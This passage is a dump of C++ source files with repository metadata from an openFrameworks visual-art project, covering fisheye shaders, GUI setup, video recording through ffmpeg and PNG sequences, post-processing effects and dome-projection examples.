reciprocal and cyclic/centric;\n\t\t\tGrowth: bi/multidirectional\n\t\t\tCharacteristics of motion\n\t\tTexture motion :\n relationship: streaming, flocking, convolution and turbulence.\n\t\t\tinternal consistency: continuity-discontinuity continuum\n\t\t\t\t\t\t\t\t(sustained -> granular -> iterative)\n\t\t\tmovement: \to periodic - aperiodic erratic\n\t\t\t\t\t\to accelerating - decelerating - flux\n\t\t\t\t\t\to grouping patterns\n\t\tBehaviour\n\t\t\tmotion coordination (vertical): loose-tight continuum\n\t\t\tmotion passage (Causality, horiz): voluntary-pressured cont.\n\t\t\trelations: dominance/subordination and conflict/coexistence.\n\n\tSpectral framework\n Note to Noise continuum (armonico, inarmonico, granular, saturado)\n (desarrollar esto)\n Occupancy of Spectral Space\n\t type: canopy, centre and root\n qualifiers:\n\t\t o emptiness - plenitude\n\t\t o diffuseness - concentration\n\t\t o streams - interstices\n\t\t o overlap - crossover\n\t\tSpectral Density (filled, packed/compressed, opaque, translucent, transparent and empty)\n\n\n\n'''\n" }, { "alpha_fraction": 0.6067615747451782, "alphanum_fraction": 0.6334519386291504, "avg_line_length": 23.9777774810791, "blob_id": "61a217fdd9362dd22dc8f5272abbd59e7dca365e", "content_id": "bfac0f4e6957330cc918dfc29c34dcb0913c7d41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1124, "license_type": "no_license", "max_line_length": 74, "num_lines": 45, "path": "/Graphics/apps/videoTest_2/src/main.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofMain.h\"\n#include \"ofApp.h\"\n#include \"TimelineApp.h\"\n#include \"ofAppGLFWWindow.h\"\n\n//========================================================================\nint main( ){\n\n//\tofGLWindowSettings settings;\n//\tsettings.setGLVersion(3,2);\n//\tofCreateWindow(settings);\n \n //classic\n// ofSetupOpenGL(1024, 576, OF_WINDOW);\n//\tofRunApp(new ofApp());\n\n \n \n \n //multi\n ofGLFWWindowSettings settings;\n \n //mainWindow\n settings.width = 1024;\n settings.height = 512;\n settings.setPosition(ofVec2f(300,0));\n settings.resizable = true;\n shared_ptr<ofAppBaseWindow> mainWindow = ofCreateWindow(settings);\n \n //timelineWindow\n settings.width = 576;\n settings.height = 750;\n settings.setPosition(ofVec2f(0,0));\n settings.resizable = false;\n shared_ptr<ofAppBaseWindow> timelineWindow = ofCreateWindow(settings);\n \n shared_ptr<ofApp> mainApp(new ofApp);\n shared_ptr<TimelineApp> timelineApp(new TimelineApp);\n mainApp->timelineApp = timelineApp;\n \n ofRunApp(timelineWindow, timelineApp);\n ofRunApp(mainWindow, mainApp);\n ofRunMainLoop();\n\n}\n" }, { "alpha_fraction": 0.3202221095561981, "alphanum_fraction": 0.34844979643821716, "avg_line_length": 31.74242401123047, "blob_id": "7715d507a3cc390cb4c57a8b7707e59975ef4f37", "content_id": "22b206512aa9c3fac1f3f39d3df28e83a3d2c17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2161, "license_type": "no_license", "max_line_length": 99, "num_lines": 66, "path": "/Graphics/addons/ofxFisheye/src/fxFixFisheye.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n Shader based on http://paulbourke.net/dome/fisheye/\n */\n#pragma once\n\n#define STRINGIFY(A) #A\n\n#include \"ofMain.h\"\n\n\nclass fxFixFisheye{\npublic:\n \n string gl2FragmentShader;\n \n fxFixFisheye(){\n\n gl2FragmentShader = \"#version 120\\n\"; // For some reason \"#version 120\\n\" makes this break.\n gl2FragmentShader += STRINGIFY(\n \n uniform sampler2DRect tex0;\n uniform float width;\n uniform float height;\n \n uniform float amount = 178.0;//aperture (0.0 - 180.0)\n \n const float PI = 3.1415926535;\n \n \n void main(){\n \n vec2 texCoordNorm = vec2(gl_TexCoord[0].s/width ,gl_TexCoord[0].t/height);\n \n float apertureHalf = 0.5 * amount * (PI / 180.0);\n float maxFactor = sin(apertureHalf);\n \n vec2 uv;\n vec2 xy = 2.0 * texCoordNorm - 1.0;//center coords\n \n float d = length(xy);\n \n if (d < 2.0-maxFactor){\n d = length(xy * maxFactor);\n float z = sqrt(1.0 - d * d);\n float r = atan(d, z) / PI;\n float phi = atan(xy.y, xy.x);\n \n uv.x = r * cos(phi) + 0.5;\n uv.y = r * sin(phi) + 0.5;\n \n }else{\n discard;\n\n //uv = texCoordNorm;\n }\n \n vec2 texCoordRescaled= vec2(uv.x * width, uv.y*height);\n vec4 color = texture2DRect(tex0, texCoordRescaled);\n gl_FragColor = color;\n \n \n }\n \n );\n }\n};\n" }, { "alpha_fraction": 0.4900737404823303, "alphanum_fraction": 0.571752667427063, "avg_line_length": 32.92307662963867, "blob_id": "318b4b0e8a9d0b8cc5ec19ffab859d5c6d67fbc7", "content_id": "4fc1b46669c006ed11288e23fcef785b416f9faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1763, "license_type": "no_license", "max_line_length": 85, "num_lines": 52, "path": "/Graphics/apps/videoTest_2/src/GuiManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "//\n// GuiManager.h\n// videoTest_2\n//\n// Created by Leo on 4/13/16.\n//\n//\n\n#include \"GuiManager.h\"\n\nvoid GuiManager::setup(){\n \n gui.setup();\n gui.add(gMode.setup(\"LINEAL/RADIAL\", false));\n gui.add(gRadMode.setup(\"Concentric/Centrifuge\", false));\n gui.add(gRadDeform.setup(\"Radial Mix\", 0.0, 0.0, 1.0));\n \n \n gui.add(gWidth.setup(\"width\", 1.0, 0., 1.0));\n gui.add(gHeight.setup(\"height/radius\", 0.25, 0., 1.0));\n gui.add(gCubesizeUnified.setup(\"cubesize\", 0.25, 0., 1.0));\n //gui.add(gCubesize.setup(\"cubesize\", ofVec3f(0.2), ofVec3f(0.0), ofVec3f(1.0)));\n gui.add(gMaskRadius.setup(\"maskRadius\", 0.0, 0.0, 1.0));\n gui.add(gHres.setup(\"Hres\", 0.3, 0., 1.0));\n gui.add(gVres.setup(\"Vres\", 0.3, 0., 1.0));\n gui.add(gXpos.setup(\"Xpos\", 0.5, 0., 1.0));\n gui.add(gYpos.setup(\"Ypos\", 0.5, 0., 1.0));\n gui.add(gVelocity.setup(\"velocity\", 0.0, 0., 1.0));\n //nz\n gui.add(gNzTime.setup(\"nzTime\", 0.1, 0.0, 1.0));\n \n gui.add(gNzXAmp.setup(\"nzXAmp\", 0.0, 0.0, 1.0));\n gui.add(gNzXFreq.setup(\"nzXFreq\", 0.5, 0.0, 1.0));\n gui.add(gNzXRug.setup(\"nzXRug\", 0.05, 0.01, 1.0));\n \n gui.add(gNzYAmp.setup(\"nzYAmp\", 0.0, 0.0, 1.0));\n gui.add(gNzYFreq.setup(\"nzYFreq\", 0.5, 0.0, 1.0));\n gui.add(gNzYRug.setup(\"nzYRug\", 2.0, 0.01, 30.0));\n \n gui.add(gNzZAmp.setup(\"nzZAmp\", 0.0, 0.0, 1.0));\n gui.add(gNzZFreq.setup(\"nzZFreq\", 0.5, 0.0, 1.0));\n gui.add(gNzZRug.setup(\"nzZRug\", 0.05, 0.01, 1.0));\n //\n gui.add(gUseCam.setup(\"useCam\", false));\n gui.add(gAxis.setup(\"axis\", false));\n gui.add(gUseLight.setup(\"useLight\", false));\n gui.add(gLightPos.setup(\"LighPos\", ofVec3f(0.5), ofVec3f(0.0), ofVec3f(1.0)));\n}\n//-------------------------\nvoid GuiManager::draw(){\n gui.draw();\n}" }, { "alpha_fraction": 0.5216563940048218, "alphanum_fraction": 0.5431665182113647, "avg_line_length": 31.542856216430664, "blob_id": "4866dd883077a8cb4f932eae79a6fd09ac86ec65", "content_id": "e70e1230a7589d834e450f8e5a34431911e74086", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6834, "license_type": "no_license", "max_line_length": 257, "num_lines": 210, "path": "/Graphics/apps/final/src/VideoRenderer.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"VideoRenderer.h\"\n\nvoid VideoRenderer::setup(int iFramerate, RecordingMode initMode, Resolution initRes){\n \n // global variables setup\n bIsRecording = false;\n framerate = iFramerate;\n currentRecMode = initMode;\n currentOutResolution = initRes;\n pngFirstFrame = true;\n \n \n //Fbo y buffers initial setup\n setOutputResolution(currentOutResolution);\n \n \n //videoRecorder setup---------------------------------\n fileName = \"movFiles/testMovie\";\n fileExt = \".mov\"; // ffmpeg uses the extension to determine the container type. run 'ffmpeg -formats' to see supported formats\n // override the default codecs if you like\n // run 'ffmpeg -codecs' to find out what your implementation supports (or -formats on some older versions)\n //vidRecorder.setVideoCodec(\"mpeg4\");\n vidRecorder.setVideoCodec(\"libx264\");//h264 codec\n vidRecorder.setVideoBitrate(\"800k\");\n vidRecorder.setAudioCodec(\"mp3\");\n vidRecorder.setAudioBitrate(\"192k\");\n \n ofAddListener(vidRecorder.outputFileCompleteEvent, this, &VideoRenderer::recordingComplete);\n}\n//------------------------------\nvoid VideoRenderer::update(){\n \n if(bIsRecording){\n if (currentRecMode == PNG_SEQUENCE) {\n \n if(!pngFirstFrame){\n // wait for the thread to finish saving the\n // previous frame and then unmap it\n saverThread.waitReady();\n pixelBufferBack.unmap();\n }\n \n // copy the fbo texture to a buffer\n fbo.getTexture().copyTo(pixelBufferBack);\n \n // bind and map the buffer as PIXEL_UNPACK so it can be\n // accessed from a different thread from the cpu\n // and send the memory address to the saver thread\n \n pixelBufferFront.bind(GL_PIXEL_UNPACK_BUFFER);\n unsigned char * p = pixelBufferFront.map<unsigned char>(GL_READ_ONLY);\n \n saverThread.save(p);\n \n // swap the front and back buffer so we are always\n // copying the texture to one buffer and reading\n // back from another to avoid stalls\n swap(pixelBufferBack,pixelBufferFront);\n \n pngFirstFrame = false;\n \n \n }else if(currentRecMode == MOV_FILE){\n \n fbo.getTexture().readToPixels(pixels);\n bool success = vidRecorder.addFrame(pixels);\n if (!success) {\n ofLogWarning(\"This frame was not added!\");\n }\n \n }\n \n }\n \n // Check if the video recorder encountered any error while writing video frame or audio smaples.\n if (vidRecorder.hasVideoError()) {\n ofLogWarning(\"The video recorder failed to write some frames!\");\n }\n \n if (vidRecorder.hasAudioError()) {\n ofLogWarning(\"The video recorder failed to write some audio samples!\");\n }\n\n}\n//------------------------------\nvoid VideoRenderer::draw(int x, int y, int w, int h){\n \n fbo.draw(x, y, w, h);\n\n}\n//------------------------------\nvoid VideoRenderer::exit(){\n ofRemoveListener(vidRecorder.outputFileCompleteEvent, this, &VideoRenderer::recordingComplete);\n vidRecorder.close();\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::startRecording(){\n bIsRecording = true;\n \n saverThread.setLastFrameMarker(ofGetFrameNum());\n saverThread.frameNumOffset = frameNumOffset;\n \n \n if(currentRecMode == MOV_FILE){\n if(!vidRecorder.isInitialized()) {\n //vidRecorder.setup(fileName+ofGetTimestampString()+fileExt, vidGrabber.getWidth(), vidGrabber.getHeight(), 30, sampleRate, channels);\n vidRecorder.setup(fileName+ofGetTimestampString()+fileExt, fbo.getWidth(), fbo.getHeight(), framerate); // no audio\n // vidRecorder.setup(fileName+ofGetTimestampString()+fileExt, 0,0,0, sampleRate, channels); // no video\n // vidRecorder.setupCustomOutput(vidGrabber.getWidth(), vidGrabber.getHeight(), 30, sampleRate, channels, \"-vcodec mpeg4 -b 1600k -acodec mp2 -ab 128k -f mpegts udp://localhost:1234\"); // for custom ffmpeg output string (streaming, etc)\n \n // Start recording\n vidRecorder.start();\n }\n }\n ofLogNotice(\"-RECORDING STARTED\");\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::stopRecording(){\n bIsRecording = false;\n if(currentRecMode == MOV_FILE) vidRecorder.close();\n ofLogNotice(\"-RECORDING ENDED\");\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::setOutputResolution(Resolution res){\n \n currentOutResolution = res;\n \n fbo.clear();\n pixels.clear();\n pixelBufferBack.unmap();\n pixelBufferFront.unmap();\n \n switch (res) {\n case r256:\n fbo.allocate(256, 256, GL_RGB);\n break;\n case r512:\n fbo.allocate(512, 512, GL_RGB);\n break;\n case r1024:\n fbo.allocate(1024, 1024, GL_RGB);\n break;\n case r2048:\n fbo.allocate(2048, 2048, GL_RGB);\n break;\n case r4096:\n fbo.allocate(4096, 4096, GL_RGB);\n break;\n \n default:\n break;\n }\n \n \n saverThread.setImageSize(fbo.getWidth(), fbo.getHeight());\n pixelBufferBack.allocate(fbo.getWidth()*fbo.getHeight() *3, GL_DYNAMIC_READ);\n pixelBufferFront.allocate(fbo.getWidth()*fbo.getHeight()*3, GL_DYNAMIC_READ);\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::recordingComplete(ofxVideoRecorderOutputFileCompleteEventArgs& args){\n cout << \"The recoded video file is now complete.\" << endl;\n}\n//--------------------------------------------------------------\nstring VideoRenderer::getRecordingModeAsString(){\n \n string s;\n \n switch (currentRecMode) {\n case PNG_SEQUENCE:\n s = \"SECUENCIA PNG\";\n break;\n case MOV_FILE:\n s = \"MOV-H264\";\n break;\n \n default:\n break;\n }\n \n return s;\n}\n//--------------------------------------------------------------\nstring VideoRenderer::getResolutionAsString(){\n \n string s;\n \n switch (currentOutResolution) {\n case r256:\n s = \"256x256\";\n break;\n case r512:\n s = \"512x512\";\n break;\n case r1024:\n s = \"1024x1024\";\n break;\n case r2048:\n s = \"2048x2048\";\n break;\n case r4096:\n s = \"4096x4096\";\n break;\n \n default:\n break;\n }\n \n return s;\n \n}" }, { "alpha_fraction": 0.5883110165596008, "alphanum_fraction": 0.6078784465789795, "avg_line_length": 29.57480239868164, "blob_id": "2d55dec160fc84d35ade16061992bf5fc8af15f9", "content_id": "0309b8fa2e0ee3c0e2660dcf27503b9e44ee8d9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3884, "license_type": "no_license", "max_line_length": 74, "num_lines": 127, "path": "/Graphics/apps/videoTest_3/src/PostProcessingManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"PostProcessingManager.h\"\n\n//TODO: add more efects and parameters\n//TODO: add gui listener for update, not update everyframe\n\n\n//---------------------------------------\nvoid PostProcessingManager::setup(int w, int h){\n \n post.init(w, h);\n \n //0-Fxaa\n post.createPass<FxaaPass>()->setEnabled(false);\n //1-Bloom\n post.createPass<BloomPass>()->setEnabled(false);\n //2-dof\n dof = post.createPass<DofPass>();\n dof->setAperture(0.2);\n dof->setMaxBlur(0.05);\n dof->setEnabled(false);\n //3-Kaleidoscopes\n post.createPass<KaleidoscopePass>()->setEnabled(false);\n //4-Noisewarp\n post.createPass<NoiseWarpPass>()->setEnabled(false);\n //5-Pixelate\n post.createPass<PixelatePass>()->setEnabled(false);\n //6-EdgePass\n post.createPass<EdgePass>()->setEnabled(false);\n //7-VerticalTilt\n post.createPass<VerticalTiltShifPass>()->setEnabled(false);\n //8-GodRays\n godRays = post.createPass<GodRaysPass>();\n godRays->setLightDirDOTviewDir(0.3);\n godRays->setEnabled(false);\n //9-LimbDarkening\n limbDarkening=post.createPass<LimbDarkeningPass>();\n limbDarkening->setEnabled(false);\n //10-Ssao\n ssao=post.createPass<SSAOPass>();\n ssao->setAoClamp(0.65);\n ssao->setLumInfluence(0.25);\n ssao->setEnabled(false);\n \n //---------\n setupGui();\n \n\n}\n//---------------------------------------\nvoid PostProcessingManager::updateValues(){\n \n //TODO: check pointers are not null\n \n post[0]->setEnabled(gDoFxaa);\n post[1]->setEnabled(gDoBloom);\n post[2]->setEnabled(gDoDof);\n post[3]->setEnabled(gDoKaleidoscope);\n post[4]->setEnabled(gDoNoiseWarp);\n post[5]->setEnabled(gDoPixelate);\n post[6]->setEnabled(gDoEdgePass);\n post[7]->setEnabled(gDoVerticalTiltShift);\n post[8]->setEnabled(gDoGodRays);\n post[9]->setEnabled(gDoLimbDarkening);\n post[10]->setEnabled(gDoSsao);\n \n \n dof->setAperture(gDofAperture);\n dof->setMaxBlur(gDofMaxBlur);\n dof->setFocus(gDofFocus);\n \n godRays->setLightDirDOTviewDir(gGodRaysLightDotView);\n \n ssao->setAoClamp(gSsaoAoClamp);\n ssao->setLumInfluence(gSsaoLumInfluence);\n \n \n \n}\n//---------------------------------------\nvoid PostProcessingManager::setupGui(){\n gui.setup(\"postProcessing\");\n \n gui.add(gDoFxaa.setup(\"Fxaa\", true));\n \n gui.add(gDoBloom.setup(\"Bloom\", true));\n \n gui.add(gDoDof.setup(\"Dof\", false));\n gui.add(gDofFocus.setup(\"Dof-Focus\", 0.9, 0.0, 1.0));\n gui.add(gDofAperture.setup(\"Dof-Aperture\", 0.2, 0.0, 1.0));\n gui.add(gDofMaxBlur.setup(\"Dof-MaxBlur\", 0.05, 0.0, 1.0));\n \n gui.add(gDoKaleidoscope.setup(\"Kaliedoscope\", false));\n gui.add(gDoNoiseWarp.setup(\"NoiseWarp\", false));\n gui.add(gDoPixelate.setup(\"Pixelate\", false));\n gui.add(gDoEdgePass.setup(\"EdgePass\", false));\n gui.add(gDoVerticalTiltShift.setup(\"VerticalTiltShift\", false));\n \n gui.add(gDoGodRays.setup(\"GodRays\", false));\n gui.add(gGodRaysLightDotView.setup(\"GodRays-Light\", 0.3, 0.0, 1.0));\n \n gui.add(gDoLimbDarkening.setup(\"LimbDarkening\", false));\n \n gui.add(gDoSsao.setup(\"Ssao\", false));\n gui.add(gSsaoAoClamp.setup(\"Ssao-AoClamp\", 0.65, 0.0, 1.0));\n gui.add(gSsaoLumInfluence.setup(\"Ssao-LumInfluence\", 0.25, 0.0, 1.0));\n}\n//---------------------------------------\nvoid PostProcessingManager::drawGui(int x, int y){\n gui.setPosition(x, y);\n gui.draw();\n}\n//---------------------------------------\nvoid PostProcessingManager::begin(){\n post.begin();\n}\n//---------------------------------------\nvoid PostProcessingManager::begin(ofCamera& cam){\n post.begin(cam);\n}\n//---------------------------------------\nvoid PostProcessingManager::begin(ofCamera &cam, ofRectangle viewport){\n post.begin(cam, viewport);\n}\n//---------------------------------------\nvoid PostProcessingManager::end(){\n post.end();\n}\n" }, { "alpha_fraction": 0.6966824531555176, "alphanum_fraction": 0.6966824531555176, "avg_line_length": 12.125, "blob_id": "814471c6111bfa9d2d6c1cbc3c5b451d8f18aabc", "content_id": "17109b8baa87bc0b438e78523e8cd3a39e20a6d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 211, "license_type": "no_license", "max_line_length": 37, "num_lines": 16, "path": "/Graphics/apps/videoTest_2/src/TimelineApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n#include \"ofxTimeline.h\"\n\n#include \"Constants.h\"\n\nclass TimelineApp: public ofBaseApp {\npublic:\n\tvoid setup();\n\tvoid draw();\n\n ofxTimeline timeline;\n};\n\n" }, { "alpha_fraction": 0.461097776889801, "alphanum_fraction": 0.4871557950973511, "avg_line_length": 21.26749038696289, "blob_id": "91f8c8330ab214e4a83a426c3707a0ea50630845", "content_id": "cef0e5fc0383e7806e85643653b4d3b654e999b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5411, "license_type": "no_license", "max_line_length": 68, "num_lines": 243, "path": "/Graphics/examples/ofxDomemasterExample/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n\n ofSetBackgroundColor(50);\n ofSetFrameRate(FRAME_RATE);\n \n\tofSetVerticalSync(false);\n\tofEnableAlphaBlending();\n \n\tfont.load(\"type/verdana.ttf\", 100, true, false, true, 0.4, 72);\n shader.load(\"shaders_gl3/noise.vert\", \"shaders_gl3/noise.frag\");\n \n domemaster.setup();\n domemaster.resize(512,512);\n domemaster.setMeshScale(meshScale);\n sceneFbo.allocate(512,512);\n\n //ofSetFrameRate(FRAME_RATE);\n\n frameDuration = 1.0 / FRAME_RATE;\n framesMaxNumber = DURATION * FRAME_RATE;\n frameCounter = 0;\n isAnimating = true;\n isPlayingForward = true;\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n\n\n //display frame rate as window title\n //ofSetWindowTitle(ofToString(ofGetFrameRate()));\n\n //animation data update\n if(isAnimating){\n if(isPlayingForward){\n frameCounter++;\n if (frameCounter>=framesMaxNumber)\n isPlayingForward = false;\n }else{\n frameCounter--;\n if (frameCounter<=0)\n isPlayingForward = true;\n }\n animationTime = frameCounter * frameDuration;\n animValue = animationTime/DURATION;\n }\n //-----------------------------------\n/*\n sceneFbo.begin();\n ofClear(0);\n for (int i=0; i<domemaster.renderCount; i++){\n domemaster.begin(i);\n drawScene(i,domemaster.width, domemaster.height);\n domemaster.end(i);\n }\n domemaster.draw();\n if(showMask){\n domemaster.drawMask();\n }\n sceneFbo.end();\n */\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n\n //sceneFbo.draw(250,0,512,512);\n\n ofSetColor(245, 58, 135);\n ofBoxPrimitive b1;\n for (int i=0; i<domemaster.renderCount; i++){\n shader.begin();\n domemaster.begin(i);\n b1.setPosition(0,0,-100);\n b1.draw();\n //drawScene(i,domemaster.width, domemaster.height);\n domemaster.end(i);\n shader.end();\n }\n \n domemaster.draw();\n shader.begin();\n b1.setPosition(0,0,-100);\n b1.draw();\n shader.end();\n\n return;\n \n\n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nS: increase mesh scale\"\n \"\\ns: decrease mesh scale\"\n \"\\nm: toggle mask\"\n \"\\nc: toggle cubemap\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, 10, 20);\n ofPopStyle();\n\n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nmesh scale: \" + ofToString(meshScale);\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, 10, ofGetHeight()-100);\n ofPopStyle();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::drawScene(int i , int width, int height){\n\n if(showCubemap){\n switch (i) {\n case 0:\n //bottom\n ofBackground(ofColor::cyan);\n break;\n case 1:\n //front\n ofBackground(ofColor::blue);\n break;\n case 2:\n //left\n ofBackground(ofColor::magenta);\n break;\n case 3:\n //right\n ofBackground(ofColor::green);\n break;\n case 4:\n //top\n ofBackground(ofColor::orange);\n break;\n }\n }\n ofSpherePrimitive s3;\n\n \n shader.begin();\n ofSetColor(245, 58, 135);\n s3.setResolution(10);\n s3.setPosition(100,100,-100);\n s3.draw();\n shader.end();\n \n \n // shader.begin();\n ofSetColor(ofColor::orange);\n s3.setResolution(10);\n s3.setPosition(0,0,-90);\n s3.draw();\n// shader.end();\n \n s3.setPosition(ofMap(animValue, 0, 1, -180, 180), 0, 0);\n s3.drawWireframe();\n\n float angle = ofGetElapsedTimef() * 1;\n float radius = 1000;\n float x = radius * cos(angle);\n float y = radius * sin(angle);\n float z = -animValue * 2000;\n\n\n s3.setPosition(x,y,z);\n s3.draw();\n\n s3.setPosition(x,y,0);\n s3.draw();\n \n\n \n\n\n}\n\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n\n switch (key) {\n\n case 's':\n meshScale -= 0.01;\n domemaster.setMeshScale(meshScale);\n break;\n case 'S':\n meshScale += 0.01;\n domemaster.setMeshScale(meshScale);\n break;\n case 'm':\n showMask = !showMask;\n break;\n case 'c':\n showCubemap = !showCubemap;\n break;\n }\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){\n\n}\n" }, { "alpha_fraction": 0.32393792271614075, "alphanum_fraction": 0.3533496856689453, "avg_line_length": 33.47887420654297, "blob_id": "acb3369e7f539f05851724fc31d09962a6eec6c8", "content_id": "ec157cfbf7e29d5af116287c32033a78c0096c31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2448, "license_type": "no_license", "max_line_length": 111, "num_lines": 71, "path": "/Graphics/addons/ofxFisheye/src/fxVariableFisheye.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n Shader based on https://www.shadertoy.com/view/4s2GRR\n */\n\n\n#pragma once\n\n#define STRINGIFY(A) #A\n\n#include \"ofMain.h\"\n\n\nclass fxVariableFisheye{\npublic:\n \n string gl2FragmentShader;\n \n fxVariableFisheye(){\n\n gl2FragmentShader = \"#version 120\\n\"; // For some reason \"#version 120\\n\" makes this break.\n gl2FragmentShader += STRINGIFY(\n \n uniform sampler2DRect tex0;\n uniform float width;\n uniform float height;\n \n uniform float amount = 0.1; // -0.5 a 0.5\n \n const float PI = 3.1415926535;\n \n void main(){\n \n vec2 texCoordNorm = vec2(gl_TexCoord[0].s/width ,gl_TexCoord[0].t/height);\n vec2 p = texCoordNorm;\n \n float prop = 1.0;\n vec2 m = vec2(0.5,0.5);\n vec2 d = p - m;\n float r = length (d);\n \n float amnt = clamp(amount, -0.5, 0.5);\n float power = ( 2.0 * PI / (2.0 * sqrt(dot(m, m))) ) * amnt;//amount of effect\n \n float bind;\n if (power > 0.0){\n bind = sqrt(dot(m, m));//stick to corners\n }else {\n bind = m.y;//stick to borders\n }\n \n \n vec2 uv;\n if (power > 0.0){\n //fisheye\n uv = m + normalize(d) * tan(r * power) * bind / tan( bind * power);\n }else if (power < 0.0){\n //antifisheye\n uv = m + normalize(d) * atan(r * -power * 10.0) * bind / atan(-power * bind * 10.0);\n }else{\n uv = p;//no effect for power = 1.0\n }\n \n vec2 texCoordRescaled= vec2(uv.x * width, uv.y*height);\n vec4 color = texture2DRect(tex0, texCoordRescaled);\n gl_FragColor = color;\n \n }\n \n );\n }\n};\n" }, { "alpha_fraction": 0.6960557103157043, "alphanum_fraction": 0.7045630216598511, "avg_line_length": 24.860000610351562, "blob_id": "d0a3af8e956919c3765d23e70e579454ce466de6", "content_id": "d2db5f5fc853df1b19557d5a97286a8115210dd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1293, "license_type": "no_license", "max_line_length": 107, "num_lines": 50, "path": "/Graphics/examples/ofxDomemasterExample/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxDomemaster.h\"\n\n#include \"VideoRenderer.h\"\n\n#define FRAME_RATE 30\n#define DURATION 4.0\n\nclass ofApp : public ofBaseApp{\n\tprivate:\n\t\tfloat meshScale = 0.66f;\n\t\tbool showCubemap = false;\n\t\tbool showMask = true;\n\n\tpublic:\n\t\tvoid setup();\n\t\tvoid update();\n\t\tvoid draw();\n\n\t\tvoid keyPressed(int key);\n\t\tvoid keyReleased(int key);\n\t\tvoid mouseMoved(int x, int y );\n\t\tvoid mouseDragged(int x, int y, int button);\n\t\tvoid mousePressed(int x, int y, int button);\n\t\tvoid mouseReleased(int x, int y, int button);\n\t\tvoid windowResized(int w, int h);\n\t\tvoid dragEvent(ofDragInfo dragInfo);\n\t\tvoid gotMessage(ofMessage msg);\n\t\tvoid drawScene(int i , int width, int height);\n\n\t\tofxDomemaster domemaster;\n\t\tofSpherePrimitive sphere;\n\t\tofBoxPrimitive box;\n\n\t\t//animation data variables----------------\n\t\tbool isAnimating;\n\t\tbool isPlayingForward;\n int frameCounter;//animation Frame Counter\n float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n\n\t\tofFbo sceneFbo; //FBO for drawing scene\n ofTrueTypeFont font;\n ofShader shader;\n\n};\n" }, { "alpha_fraction": 0.430489718914032, "alphanum_fraction": 0.4473406970500946, "avg_line_length": 22.880502700805664, "blob_id": "d3739f187a653e567a8fa50f0eb66c6b9116121f", "content_id": "56518134be53a8555d36a44b25f28a40537eedbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3798, "license_type": "no_license", "max_line_length": 137, "num_lines": 159, "path": "/Graphics/examples/ofxFisheyeExample/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n\n ofBackground(34);\n \n w = ofGetWidth();\n h = ofGetHeight();\n\n#ifdef TARGET_OPENGLES\n\tshader.load(\"shaders_gles/noise.vert\",\"shaders_gles/noise.frag\");\n#else\n\tif(ofIsGLProgrammableRenderer()){\n\t\tshader.load(\"shaders_gl3/noise.vert\", \"shaders_gl3/noise.frag\");\n\t}else{\n\t\tshader.load(\"shaders/noise.vert\", \"shaders/noise.frag\");\n\t}\n#endif\n \n fbo.allocate(w, h);\n\n fisheye.setup(tFixFisheye);\n\n\tdoShader = true;\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n static float lastElapsedTime=0;\n static float growingRadius=0;\n float cell = w/16.;\n float deltaTime = 